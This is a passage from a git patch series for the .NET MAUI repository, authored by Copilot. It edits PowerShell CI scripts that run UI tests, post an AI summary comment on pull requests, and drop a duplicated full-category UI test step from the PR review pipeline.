$scriptOutput = Invoke-WithoutGhTokens { & dotnet @testArgs 2>&1 } $scriptOutput | Out-File -FilePath $LogFile -Force -Encoding utf8 return $LogFile } @@ -459,7 +481,7 @@ function Invoke-TestRun { $deviceParams.DeviceUdid = $script:BootedDeviceUdid } - $scriptOutput = & $deviceTestScript @deviceParams 2>&1 + $scriptOutput = Invoke-WithoutGhTokens { & $deviceTestScript @deviceParams 2>&1 } $scriptOutput | Out-File -FilePath $LogFile 
-Force -Encoding utf8 return $LogFile } From d8ff0a1dc49ef6a58e29a22e500685a2ee18daea Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Wed, 27 May 2026 11:07:47 +0200 Subject: [PATCH 14/34] Fix AI summary session replacement Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/scripts/post-ai-summary-comment.ps1 | 81 ++------------------- 1 file changed, 5 insertions(+), 76 deletions(-) diff --git a/.github/scripts/post-ai-summary-comment.ps1 b/.github/scripts/post-ai-summary-comment.ps1 index 26d25a082058..5648709851a6 100644 --- a/.github/scripts/post-ai-summary-comment.ps1 +++ b/.github/scripts/post-ai-summary-comment.ps1 @@ -6,11 +6,8 @@ .DESCRIPTION Maintains ONE comment per PR, identified by marker. Before posting a fresh comment, any older generated AI Summary comments are - removed. Existing session blocks are preserved in the newly posted comment. - Each review run adds an expandable session keyed by HEAD commit SHA. - - Same commit SHA → replaces that session in the newly posted comment. - - New commit SHA → prepends a new session (latest first). - Older sessions stay collapsed; the newest is expanded by default. + removed. The replacement comment contains only the latest review session, + keyed by the current HEAD commit SHA. After posting, the PR author is @-mentioned so they know to review. @@ -196,63 +193,13 @@ $phaseContent $sessionMarkerEnd "@ -# ============================================================================ -# MERGE WITH EXISTING SESSIONS -# ============================================================================ - -function Merge-Sessions { - param( - [string]$ExistingBody, - [string]$NewSession, - [string]$CommitSha7 - ) - - # Extract all session blocks from existing body - $sessionPattern = '(?s).*?' 
- $existingSessions = [regex]::Matches($ExistingBody, $sessionPattern) - - $sessions = [ordered]@{} - foreach ($match in $existingSessions) { - $sha = $match.Groups[1].Value - $sessions[$sha] = $match.Value - } - - # Replace or prepend new session - $sessions[$CommitSha7] = $NewSession - - # Rebuild: newest session first (the one we just added/replaced) - $orderedKeys = @($CommitSha7) + @($sessions.Keys | Where-Object { $_ -ne $CommitSha7 }) - - $allSessions = @() - $isFirst = $true - foreach ($sha in $orderedKeys) { - $block = $sessions[$sha] - if ($isFirst) { - # Ensure ONLY the outer (session-wrapping) details tag is open. Inner - # phase tags must keep their original open/collapsed state — we used - # to re-open all of them via a global regex replace, which forced - # every phase to expand on each new session. - $rx = [regex]::new('') - $block = $rx.Replace($block, '
', 1) - $isFirst = $false - } else { - # Collapse the outer details of older sessions; leave inner phases alone. - $rx = [regex]::new('') - $block = $rx.Replace($block, '
', 1) - } - $allSessions += $block - } - - return ($allSessions -join "`n`n---`n`n") -} - # ============================================================================ # FIND EXISTING COMMENT & BUILD FINAL BODY # ============================================================================ Write-Host "Checking for existing review comment..." -ForegroundColor Yellow -$existingBody = $null $existingCommentIds = @() +$existingBodies = @() $existingRaw = gh api "repos/dotnet/maui/issues/$PRNumber/comments" --paginate 2>$null if ($existingRaw) { @@ -262,7 +209,6 @@ if ($existingRaw) { if ($existingObjs.Count -gt 0) { $existingCommentIds = @($existingObjs | ForEach-Object { $_.id }) $existingBodies = @($existingObjs | ForEach-Object { [string]$_.body }) - $existingBody = $existingBodies -join "`n`n---`n`n" Write-Host "✓ Found existing AI Summary comment(s): $($existingCommentIds -join ', ')" -ForegroundColor Green } } catch { @@ -286,32 +232,15 @@ if ($existingBodies -and $existingBodies.Count -gt 0) { } } -if ($existingBody) { - # Merge new session into all existing AI Summary bodies before deleting the - # old comments. This keeps prior session history even if retries created - # multiple generated comments. 
- $mergedSessions = Merge-Sessions -ExistingBody $existingBody -NewSession $newSessionBlock -CommitSha7 $commitSha7 - - $commentBody = @" -$MARKER - -## 🤖 AI Summary - -$authorPing - -$mergedSessions$finalizeSection -"@ -} else { - $commentBody = @" +$commentBody = @" $MARKER ## 🤖 AI Summary $authorPing -$newSessionBlock +$newSessionBlock$finalizeSection "@ -} # Clean up excessive blank lines $commentBody = $commentBody -replace "`n{4,}", "`n`n`n" From 3650971cff6b6c097ea3c61e7e728a6cbb0c6203 Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Thu, 28 May 2026 10:36:28 +0200 Subject: [PATCH 15/34] Remove duplicate full-category UI test run from ReviewPR stage MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Step 3 (Run Detected UI Tests) was running BuildAndRunHostApp.ps1 per detected category inside the ReviewPR stage, duplicating the same work that RunDeepUITests (Stage 2) does. This caused UI tests to run twice. Now the ReviewPR stage only runs targeted PR-specific tests via the Gate (verify-tests-fail.ps1), and full-category runs happen exclusively in the RunDeepUITests stage. Renumbered steps: old 4→3, 5→4, 6→5, 7→6, 8→7. 
Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/scripts/Review-PR.ps1 | 539 +++------------------------------- 1 file changed, 39 insertions(+), 500 deletions(-) diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index cb39a45faf59..c966ce7d9218 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -7,13 +7,15 @@ Step 1: Branch setup - Create review branch from main, merge PR squashed Step 2: Detect UI categories - Run eng/scripts/detect-ui-test-categories.ps1 (info only) - Step 3: Run detected UI tests - Execute BuildAndRunHostApp.ps1 per detected category (informational) - Step 4: Regression cross-ref - Run Find-RegressionRisks.ps1 + run any tests from prior fix PRs - Step 5: Gate - Run test verification directly (verify-tests-fail.ps1) - Step 6: Multi-candidate review - Pre-Flight, then PARALLEL (expert-reviewer eval of PR + Try-Fix×4), + Step 3: Regression cross-ref - Run Find-RegressionRisks.ps1 + run any tests from prior fix PRs + Step 4: Gate - Run test verification directly (verify-tests-fail.ps1) + Step 5: Multi-candidate review - Pre-Flight, then PARALLEL (expert-reviewer eval of PR + Try-Fix×4), then Report compares all candidates and writes winner.json - Step 7: Post AI Summary - Directly runs posting scripts - Step 8: Apply labels - Apply agent labels based on review results + Step 6: Post AI Summary - Directly runs posting scripts + Step 7: Apply labels - Apply agent labels based on review results + + NOTE: Full-category UI test runs happen in the RunDeepUITests stage (ci-copilot.yml Stage 2), + not here. This script only runs targeted PR-specific tests in the Gate (Step 4). By default, the script checks out main and creates a review branch from it. If squash-merge conflicts, the script posts a comment on the PR and exits. 
@@ -395,8 +397,8 @@ if ($Phase -and $Phase -ne 'Setup') { # ─── Helper: Parse `dotnet test --logger "console;verbosity=detailed"` ────── # Extracts per-test results (Passed/Failed/Skipped) plus failure messages and -# stack traces from raw stdout. Used by STEP 3 so the AI summary comment shows -# WHICH tests failed and WHY, not just an aggregate exit code. +# stack traces from raw stdout. Used by the RunDeepUITests stage and Gate so the +# AI summary comment shows WHICH tests failed and WHY, not just an aggregate exit code. function Get-DotNetTestResults { param([string[]]$Lines) @@ -476,7 +478,7 @@ function Get-DotNetTestResults { # --logger "trx;LogFileName=.trx" --results-directory # The TRX is the same format AzDO's PublishTestResults@2 ingests, so it has # every test's outcome, duration, error message and stack trace — without -# any console-scrape ambiguity. STEP 3 prefers TRX when available because +# any console-scrape ambiguity. The RunDeepUITests stage and Gate prefer TRX when available because # parsing console output is fragile when many tests run, lines wrap, or # multi-line ErrorRecords get glued together by PowerShell stream merging. # Get-TrxResults: defined inline because Review-PR.ps1 is invoked by @@ -812,458 +814,12 @@ if ($LASTEXITCODE -ne 0) { } # ═════════════════════════════════════════════════════════════════════════════ -# STEP 3: RUN DETECTED UI TEST CATEGORIES (script, no copilot agent) +# STEP 3: REGRESSION CROSS-REFERENCE (script, no copilot agent) # ═════════════════════════════════════════════════════════════════════════════ -# Runs the UI test categories that Step 2 detected. Skipped when: -# - $uitestCategories is 'NONE' (no UI-relevant changes) -# - $uitestCategories is empty/blank (run-all matrix — too expensive locally) -# Results are appended to the existing uitests/content.md so they show up in -# the same collapsible section of the AI summary comment. 
Write-Host "" Write-Host "╔═══════════════════════════════════════════════════════════╗" -ForegroundColor Cyan -Write-Host "║ STEP 3: RUN DETECTED UI TESTS ║" -ForegroundColor Cyan -Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Cyan - -$uitestRunResult = "SKIPPED" -$uitestRunnerScript = Join-Path $ScriptsDir "BuildAndRunHostApp.ps1" - -if ($uitestCategories -eq 'NONE') { - Write-Host " ⏭️ Skipped — detection returned NONE (no UI-relevant changes)" -ForegroundColor DarkGray -} elseif ([string]::IsNullOrWhiteSpace($uitestCategories)) { - Write-Host " ⏭️ Skipped — detection returned the run-all matrix (too expensive to run all categories locally)" -ForegroundColor DarkGray -} elseif (-not (Test-Path $uitestRunnerScript)) { - Write-Host " ⚠️ BuildAndRunHostApp.ps1 not found — cannot run UI tests" -ForegroundColor Yellow -} else { - # Mirror the regression-test platform fallback so a $Platform-less invocation - # still has a concrete target instead of silently picking nothing. - $uitestPlatform = if ($Platform) { $Platform } else { "android" } - - $categoryList = @($uitestCategories -split ',' | ForEach-Object { $_.Trim() } | Where-Object { $_ }) - Write-Host " 🧪 Running $($categoryList.Count) detected UI category(ies) on '$uitestPlatform'…" -ForegroundColor Cyan - - $uitestRunOutputDir = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/uitests" - New-Item -ItemType Directory -Force -Path $uitestRunOutputDir | Out-Null - - $uitestPassed = 0 - $uitestFailed = 0 - $uitestSkipped = 0 - $uitestDetails = @() - - foreach ($cat in $categoryList) { - Write-Host "" - Write-Host " 📋 [$cat] Invoke-UITestWithRetry -Platform $uitestPlatform -Category $cat" -ForegroundColor Cyan - - # Delegate to the shared deploy+retry script so STEP 3 uses the - # SAME pre-boot + retry-on-env-error + device-reboot pipeline as - # the Gate (verify-tests-fail.ps1's Invoke-TestRun + - # Invoke-TestRunWithRetry). 
When the Android emulator/iOS sim - # rejects an install ("ADB0010 Broken pipe", XHarness exit 83, - # AppiumServerHasNotBeenStartedLocally, …) the helper retries up - # to 3 times with adb reboot / simctl boot recovery between - # attempts. Without this, a single transient install failure was - # turning into "119 OneTimeSetUp timeouts" in the AI summary. - $catLogPath = Join-Path $uitestRunOutputDir ("$cat-output.log") - $catStart = Get-Date - $sharedRunner = Join-Path $ScriptsDir "shared/Invoke-UITestWithRetry.ps1" - $runResult = $null - $testOutput = @() - $testExitCode = -1 - $envErrHit = $null - try { - $runResult = Invoke-WithoutGhTokens { & $sharedRunner ` - -Platform $uitestPlatform ` - -Category $cat ` - -RepoRoot $RepoRoot ` - -LogFile $catLogPath - } - if ($runResult) { - $testOutput = $runResult.Output - $testExitCode = $runResult.ExitCode - $envErrHit = $runResult.EnvErrorHit - Write-Host " Attempts: $($runResult.Attempts) · Exit: $testExitCode · EnvError: $envErrHit" -ForegroundColor Gray - $testOutput | Select-Object -Last 20 | ForEach-Object { Write-Host " $_" } - } - } catch { - Write-Host " ⚠️ Shared runner threw: $_" -ForegroundColor Yellow - $testExitCode = -1 - } - $catDuration = [math]::Round(((Get-Date) - $catStart).TotalSeconds, 1) - - # Parse per-test results. We prefer the TRX file written by - # `dotnet test --logger trx` (mirrors CI pipeline 313's - # `RunTestWithLocalDotNet`) — it's authoritative because it captures - # every test's outcome, duration, error and stack regardless of - # how the console output got wrapped or interleaved. We only fall - # back to scraping the captured stdout via Get-DotNetTestResults - # when the TRX is missing (build/deploy crashed before tests ran, - # or an older BuildAndRunHostApp.ps1 ran without --logger trx). 
- $perTestResults = @() - $trxAggregate = $null - $trxPath = if ($runResult) { [string]$runResult.TrxResultFile } else { $null } - if ($trxPath -and (Test-Path $trxPath)) { - try { - $trxAggregate = Get-TrxResults -TrxPath $trxPath - if ($trxAggregate) { - $perTestResults = @($trxAggregate.Results) - Write-Host " 📄 TRX parsed: total=$($trxAggregate.Total) passed=$($trxAggregate.Passed) failed=$($trxAggregate.Failed) skipped=$($trxAggregate.Skipped)" -ForegroundColor Cyan - } - } catch { - Write-Host " ⚠️ Failed to parse TRX $trxPath : $_" -ForegroundColor Yellow - } - } - if (-not $trxAggregate) { - try { - $perTestResults = @(Get-DotNetTestResults -Lines $testOutput) - } catch { - Write-Host " ⚠️ Failed to parse per-test results: $_" -ForegroundColor Yellow - } - } - $catFailedTests = @($perTestResults | Where-Object { $_.status -eq 'Failed' }) - $catPassedTests = @($perTestResults | Where-Object { $_.status -eq 'Passed' }) - # Authoritative aggregate counts: TRX > per-test array. (When the TRX - # is present its attribute beats counting - # array items because VSTest may report retries/skips that aren't in - # individual nodes.) 
- if ($trxAggregate) { - $catTotalCount = [int]$trxAggregate.Total - $catPassedCount = [int]$trxAggregate.Passed - $catFailedCount = [int]$trxAggregate.Failed - } else { - $catTotalCount = $perTestResults.Count - $catPassedCount = $catPassedTests.Count - $catFailedCount = $catFailedTests.Count - } - - if ($testExitCode -eq 0) { - Write-Host " ✅ PASSED ($catDuration s, $catPassedCount test(s))" -ForegroundColor Green - $uitestPassed++ - $uitestDetails += @{ - category = $cat - result = 'PASSED' - duration_s = $catDuration - tests_total = $catTotalCount - tests_passed = $catPassedCount - tests_failed = 0 - passed_tests = @($catPassedTests | ForEach-Object { @{ name = $_.name; duration = $_.duration } }) - failed_tests = @() - } - } elseif ($testExitCode -eq -1) { - Write-Host " ⏭️ SKIPPED" -ForegroundColor DarkGray - $uitestSkipped++ - $uitestDetails += @{ - category = $cat - result = 'SKIPPED' - duration_s = $catDuration - reason = 'Runner threw an exception' - tests_total = 0 - tests_passed = 0 - tests_failed = 0 - passed_tests = @() - failed_tests = @() - } - } else { - Write-Host " ❌ FAILED (exit code: $testExitCode, $catDuration s, $catFailedCount failed test(s))" -ForegroundColor Red - foreach ($ft in $catFailedTests) { - Write-Host " • $($ft.name)" -ForegroundColor Red - } - $uitestFailed++ - # When per-test parsing found no failures (e.g. build/deploy - # crashed before tests ran), capture the last 30 lines of the - # category's stdout so the AI summary can show the actual error - # (CS0246, RS0016, missing dependency, etc.) instead of just - # "exit code 1". 
- $buildTail = $null - if ($catFailedCount -eq 0) { - try { - $tail = @($testOutput | ForEach-Object { "$_" } | Select-Object -Last 30) - $buildTail = ($tail -join "`n").Trim() - } catch { $buildTail = $null } - } - # Detect infrastructure-level failure: when ALL failures share a - # OneTimeSetUp timeout AND the build log shows the HostApp couldn't - # be installed/launched (ADB install failure, broken pipe, no - # device, etc.), this is a CI infra problem — not real test - # regressions. Reviewers shouldn't be alarmed by "119 failed tests" - # when the app never even started. - # - # If $envErrHit was set above, use that — the retry loop already - # detected an env error and exhausted retries. - # Load shared env-error patterns (single source of truth). - $sharedPatternsScript = Join-Path $ScriptsDir "shared/Get-EnvErrorPatterns.ps1" - if (Test-Path $sharedPatternsScript) { - . $sharedPatternsScript - $infraSignals = Get-EnvErrorPatterns - } else { - $infraSignals = @( - 'InstallFailedException', - 'Failure calling service package', - 'ADB0010', - 'Broken pipe', - 'no devices/emulators found', - 'device offline', - 'Could not connect to device', - 'Failed to launch the application', - 'cmd: Failure' - ) - } - $infraReason = $envErrHit - if (-not $infraReason -and $catFailedTests.Count -gt 0) { - # Two equally-strong infra-failure indicators: - # (a) every failure is `OneTimeSetUp:` — driver couldn't - # reach the runner UI button. - # (b) the build itself failed (`Build FAILED`) and there - # are zero passes — NUnit then "fails" every test in - # the assembly because the HostApp APK never got - # installed. 
- $logText = ($testOutput | ForEach-Object { "$_" }) -join "`n" - $allOneTimeSetup = @($catFailedTests | Where-Object { - ($_.error -as [string]) -match '^OneTimeSetUp:' - }).Count -eq $catFailedTests.Count - $buildFailedNoPasses = ($catPassedCount -eq 0) -and ($logText -match '(?m)^Build FAILED\.\s*$') - if ($allOneTimeSetup -or $buildFailedNoPasses) { - foreach ($sig in $infraSignals) { - if ($logText -match $sig) { - $infraReason = $sig - break - } - } - } - } - $uitestDetails += @{ - category = $cat - result = 'FAILED' - duration_s = $catDuration - exit_code = $testExitCode - tests_total = $catTotalCount - tests_passed = $catPassedCount - tests_failed = $catFailedCount - build_tail = $buildTail - infra_failure = $infraReason - trx_path = $trxPath - passed_tests = @($catPassedTests | ForEach-Object { @{ name = $_.name; duration = $_.duration } }) - failed_tests = @($catFailedTests | ForEach-Object { - @{ - name = $_.name - duration = $_.duration - error = $_.error - stack = $_.stack - } - }) - } - } - } - - if ($uitestFailed -gt 0) { - $uitestRunResult = "FAILED" - Write-Host "" - Write-Host " 🔴 UI test result: $uitestPassed passed, $uitestFailed FAILED, $uitestSkipped skipped" -ForegroundColor Red - } elseif ($uitestPassed -gt 0) { - $uitestRunResult = "PASSED" - Write-Host "" - Write-Host " ✅ UI test result: $uitestPassed passed, $uitestSkipped skipped" -ForegroundColor Green - } else { - $uitestRunResult = "SKIPPED" - Write-Host "" - Write-Host " ⏭️ All UI categories skipped ($uitestSkipped total)" -ForegroundColor DarkGray - } - - # Append a results table to the existing uitests/content.md so the same - # collapsible "UI Tests — Category Detection" section in the AI summary - # comment now contains both the detected list and the run results. 
- $uitestContentFile = Join-Path $uitestRunOutputDir "content.md" - $appendMd = New-Object System.Text.StringBuilder - [void]$appendMd.AppendLine() - [void]$appendMd.AppendLine("### 🧪 UI Test Execution Results") - [void]$appendMd.AppendLine() - $resultIcon = switch ($uitestRunResult) { "PASSED" { "✅" }; "FAILED" { "❌" }; default { "⏭️" } } - [void]$appendMd.AppendLine("$resultIcon **$uitestRunResult** — $uitestPassed passed, $uitestFailed failed, $uitestSkipped skipped (platform: ``$uitestPlatform``)") - [void]$appendMd.AppendLine() - if ($uitestDetails.Count -gt 0) { - [void]$appendMd.AppendLine("| Category | Result | Tests | Duration | Notes |") - [void]$appendMd.AppendLine("|---|---|---|---|---|") - foreach ($d in $uitestDetails) { - $icon = switch ($d.result) { "PASSED" { "✅" }; "FAILED" { "❌" }; default { "⏭️" } } - # Tests column: e.g. "1/1 ✓" on pass, "0/1 (1 ❌)" on fail. When the - # category itself failed but no per-test failures were parsed (e.g. - # build/deploy crashed before tests ran), don't claim a green ✓ — - # show "build/deploy failed" so reviewers aren't misled. 
- $tCount = if ($null -ne $d.tests_total) { [int]$d.tests_total } else { 0 } - $tPass = if ($null -ne $d.tests_passed) { [int]$d.tests_passed } else { 0 } - $tFail = if ($null -ne $d.tests_failed) { [int]$d.tests_failed } else { 0 } - $testsCol = if ($d.infra_failure) { - "🛠️ infra failure ($tFail bogus failures)" - } - elseif ($d.result -eq 'FAILED' -and $tFail -eq 0) { - if ($tCount -eq 0) { "build/deploy failed" } - else { "$tPass/$tCount — build/deploy failed before per-test results" } - } - elseif ($tCount -eq 0) { "—" } - elseif ($tFail -gt 0) { "$tPass/$tCount ($tFail ❌)" } - else { "$tPass/$tCount ✓" } - $notes = if ($d.infra_failure) { "infra: $($d.infra_failure)" } - elseif ($d.exit_code) { "exit code $($d.exit_code)" } - elseif ($d.reason) { $d.reason } - else { "" } - [void]$appendMd.AppendLine("| ``$($d.category)`` | $icon $($d.result) | $testsCol | $($d.duration_s)s | $notes |") - } - } - [void]$appendMd.AppendLine() - - # Per-failed-category breakdown: collapsible block with each failed test's - # name, error message, and first stack frame so a reviewer can diagnose - # without downloading the full build artifact. When a category failed but - # produced no per-test failures (build/deploy crashed), surface the last - # 30 lines of stdout so the AI summary still pinpoints the cause. - $failedCats = @($uitestDetails | Where-Object { $_.result -eq 'FAILED' -and (($_.failed_tests -and $_.failed_tests.Count -gt 0) -or $_.build_tail) }) - $infraCats = @($failedCats | Where-Object { $_.infra_failure }) - if ($infraCats.Count -gt 0) { - [void]$appendMd.AppendLine("> ⚠️ **Infrastructure failure detected** — for $($infraCats.Count) categor$(if ($infraCats.Count -eq 1) { 'y' } else { 'ies' }) below, the HostApp couldn't be installed or launched on the device (build/deploy failed). NUnit then reports every test in the assembly as failed. **These are NOT real test regressions** — the test runner never started. 
Look for ``$($infraCats[0].infra_failure)`` in the build log.") - [void]$appendMd.AppendLine() - } - if ($failedCats.Count -gt 0) { - [void]$appendMd.AppendLine("#### Failed test details") - [void]$appendMd.AppendLine() - foreach ($d in $failedCats) { - $hasFailedTests = $d.failed_tests -and $d.failed_tests.Count -gt 0 - $headSummary = if ($d.infra_failure) { - "🛠️ $($d.category) — infra failure ($($d.failed_tests.Count) bogus failures, app never installed)" - } elseif ($hasFailedTests) { - "❌ $($d.category) — $($d.failed_tests.Count) failed test$(if ($d.failed_tests.Count -ne 1) { 's' })" - } else { - "❌ $($d.category) — build/deploy failed (no per-test results)" - } - [void]$appendMd.AppendLine("
$headSummary") - [void]$appendMd.AppendLine() - if ($hasFailedTests) { - # GitHub's comment body limit is 65,536 chars; large categories - # can have 100+ failures with multi-KB error messages each. - # Group by error message to dedup the common "OneTimeSetUp: - # Timed out…" cases (one root cause, N tests). Show full - # detail for the first 5 unique errors, then a compact list. - # @() wrap is required: Group-Object on a single unique key - # returns ONE GroupInfo (not an array), and `.Count` on a - # GroupInfo returns the size of the group, not the number of - # groups — without @() the foreach below would iterate the - # group's members instead of the groups themselves. - $byErr = @($d.failed_tests | Group-Object -Property { - if ($_.error) { ($_.error -as [string]).Substring(0, [Math]::Min(200, ([string]$_.error).Length)) } else { '' } - } | Sort-Object Count -Descending) - - $shownGroups = 0 - foreach ($g in $byErr) { - if ($shownGroups -ge 5) { - $remaining = ($byErr | Select-Object -Skip 5 | Measure-Object -Property Count -Sum).Sum - [void]$appendMd.AppendLine("…and $remaining more failure(s) with other error signatures (see CopilotLogs artifact for full detail).") - [void]$appendMd.AppendLine() - break - } - $shownGroups++ - - $first = $g.Group[0] - $count = $g.Count - if ($count -gt 1) { - $sampleNames = ($g.Group | Select-Object -First 3 | ForEach-Object { "``$($_.name)``" }) -join ', ' - $more = if ($count -gt 3) { ", … (+$($count - 3) more)" } else { '' } - [void]$appendMd.AppendLine("**$count tests failed with the same error** — e.g. 
$sampleNames$more") - } else { - [void]$appendMd.AppendLine("**``$($first.name)``** *(took $($first.duration))*") - } - [void]$appendMd.AppendLine() - - $errBody = if ($first.error) { - $e = [string]$first.error - if ($e.Length -gt 1500) { $e.Substring(0, 1500) + "`n…(truncated)" } else { $e } - } else { "_(no error message captured)_" } - [void]$appendMd.AppendLine('```') - [void]$appendMd.AppendLine($errBody) - [void]$appendMd.AppendLine('```') - if ($first.stack) { - $firstFrame = ($first.stack -split "`n" | Where-Object { $_.Trim() } | Select-Object -First 1) - if ($firstFrame) { - [void]$appendMd.AppendLine("> at $($firstFrame.Trim().TrimStart('a','t',' '))") - [void]$appendMd.AppendLine() - } - } - } - - # Always print a compact name-only list of every failed test - # so reviewers know exactly which tests need to be re-run, - # even if their error matched a deduped group above. - if ($d.failed_tests.Count -gt 1) { - [void]$appendMd.AppendLine("
All $($d.failed_tests.Count) failed test names") - [void]$appendMd.AppendLine() - foreach ($ft in $d.failed_tests) { - [void]$appendMd.AppendLine("- ``$($ft.name)``") - } - [void]$appendMd.AppendLine() - [void]$appendMd.AppendLine("
") - [void]$appendMd.AppendLine() - } - } - if ($d.build_tail) { - $tail = [string]$d.build_tail - if ($tail.Length -gt 3000) { $tail = $tail.Substring($tail.Length - 3000) } - [void]$appendMd.AppendLine("Last 30 lines of build/test stdout:") - [void]$appendMd.AppendLine() - [void]$appendMd.AppendLine('```') - [void]$appendMd.AppendLine($tail) - [void]$appendMd.AppendLine('```') - } - [void]$appendMd.AppendLine() - [void]$appendMd.AppendLine("
") - [void]$appendMd.AppendLine() - } - } - - # Per-passed-category mini-summary: only emitted if there were ANY passed - # tests, so empty/skipped runs stay quiet. - $passedCats = @($uitestDetails | Where-Object { $_.passed_tests -and $_.passed_tests.Count -gt 0 -and $_.result -eq 'PASSED' }) - if ($passedCats.Count -gt 0) { - [void]$appendMd.AppendLine("
Show $(($passedCats | Measure-Object -Property tests_passed -Sum).Sum) passed test name(s)") - [void]$appendMd.AppendLine() - foreach ($d in $passedCats) { - [void]$appendMd.AppendLine("**``$($d.category)``**") - [void]$appendMd.AppendLine() - foreach ($pt in $d.passed_tests) { - [void]$appendMd.AppendLine("- ``$($pt.name)`` *($($pt.duration))*") - } - [void]$appendMd.AppendLine() - } - [void]$appendMd.AppendLine("
") - [void]$appendMd.AppendLine() - } - [void]$appendMd.AppendLine("_Failures here are informational only — they do not block the gate or affect try-fix candidate scoring._") - Add-Content $uitestContentFile $appendMd.ToString() -Encoding UTF8 - - # JSON summary for downstream consumers / debugging. - @{ - result = $uitestRunResult - platform = $uitestPlatform - passed = $uitestPassed - failed = $uitestFailed - skipped = $uitestSkipped - details = $uitestDetails - } | ConvertTo-Json -Depth 4 | Set-Content (Join-Path $uitestRunOutputDir "test-results.json") -Encoding UTF8 - - # result.txt — one-line traceability marker (PASSED / FAILED / SKIPPED). - $uitestRunResult | Set-Content (Join-Path $uitestRunOutputDir "result.txt") -Encoding UTF8 -} - -# Restore the review branch in case BuildAndRunHostApp.ps1 (or any of its -# child invocations) detached HEAD or switched branches. -git checkout $reviewBranch 2>$null | Out-Null -if ($LASTEXITCODE -ne 0) { - Write-Host " ⚠️ Failed to restore review branch '$reviewBranch' after Step 3 — subsequent steps may run against the wrong tree" -ForegroundColor Red -} - -# ═════════════════════════════════════════════════════════════════════════════ -# STEP 4: REGRESSION CROSS-REFERENCE (script, no copilot agent) -# ═════════════════════════════════════════════════════════════════════════════ - -Write-Host "" -Write-Host "╔═══════════════════════════════════════════════════════════╗" -ForegroundColor Cyan -Write-Host "║ STEP 4: REGRESSION CROSS-REFERENCE ║" -ForegroundColor Cyan +Write-Host "║ STEP 3: REGRESSION CROSS-REFERENCE ║" -ForegroundColor Cyan Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Cyan $regressionOutputDir = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/regression-check" @@ -1291,7 +847,7 @@ if (Test-Path $regressionScript) { Write-Host " ⚠️ Find-RegressionRisks.ps1 not found" -ForegroundColor Yellow } -# --- Regression Test Execution (part of STEP 4) 
--- +# --- Regression Test Execution (part of STEP 3) --- $regressionTestResult = "SKIPPED" $regressionRisksJson = Join-Path $regressionOutputDir "risks.json" if (Test-Path $regressionRisksJson) { @@ -1447,13 +1003,13 @@ if ($risksData -and ($risksData.result -eq 'REVERT' -or $risksData.result -eq 'O } # ═════════════════════════════════════════════════════════════════════════════ -# STEP 5: Gate - Test Before and After Fix (script, no copilot agent) +# STEP 4: Gate - Test Before and After Fix (script, no copilot agent) # ═════════════════════════════════════════════════════════════════════════════ -# TEMP: Skip Gate (STEP 5) + Try-Fix (STEP 6) for fast iteration on the +# TEMP: Skip Gate (STEP 4) + Try-Fix (STEP 5) for fast iteration on the # inline-stages architecture. Both phases are expensive (build the whole -# repo, run agents on multiple candidates) and we just need STEPs 1-4 + -# STEP 7 (post comment) to validate that detectedCategories / +# repo, run agents on multiple candidates) and we just need STEPs 1-3 + +# STEP 6 (post comment) to validate that detectedCategories / # aiSummaryCommentId output variables flow through to the new # RunDeepUITests + UpdateAISummaryComment stages. 
Flip $skipGateAndTryFix # back to $false (or delete the wrapper) once the new pipeline stages @@ -1463,7 +1019,7 @@ if (-not $skipGateAndTryFix) { Write-Host "" Write-Host "╔═══════════════════════════════════════════════════════════╗" -ForegroundColor Yellow -Write-Host "║ STEP 5: GATE — TEST VERIFICATION ║" -ForegroundColor Yellow +Write-Host "║ STEP 4: GATE — TEST VERIFICATION ║" -ForegroundColor Yellow Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Yellow $gateOutputDir = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/gate" @@ -1790,7 +1346,7 @@ if ($Phase -eq 'CopilotReview') { git checkout $reviewBranch 2>$null | Out-Null # ═════════════════════════════════════════════════════════════════════════════ -# STEP 6: PR Review (3-phase skill: Pre-Flight, Try-Fix, Report) +# STEP 5: PR Review (3-phase skill: Pre-Flight, Try-Fix, Report) # ═════════════════════════════════════════════════════════════════════════════ $gateStatusForPrompt = switch ($gateResult) { @@ -1825,8 +1381,8 @@ Run these AFTER your primary test command succeeds. If any regression test fails } } -# ── STEP 6a: Try-Fix — iterative candidate generation (Copilot call 1) ──── -$step6aPrompt = @" +# ── STEP 5a: Try-Fix — iterative candidate generation (Copilot call 1) ──── +$step5aPrompt = @" Generate alternative fix candidates for PR #$PRNumber using an iterative expert-review-and-test loop. ## Phase 1 — Pre-Flight (context only) @@ -1860,14 +1416,14 @@ Do NOT re-run gate verification. The gate phase is handled separately. ⚠️ Do NOT create or overwrite ``gate/content.md`` — it is already generated by the gate script with detailed test output. 
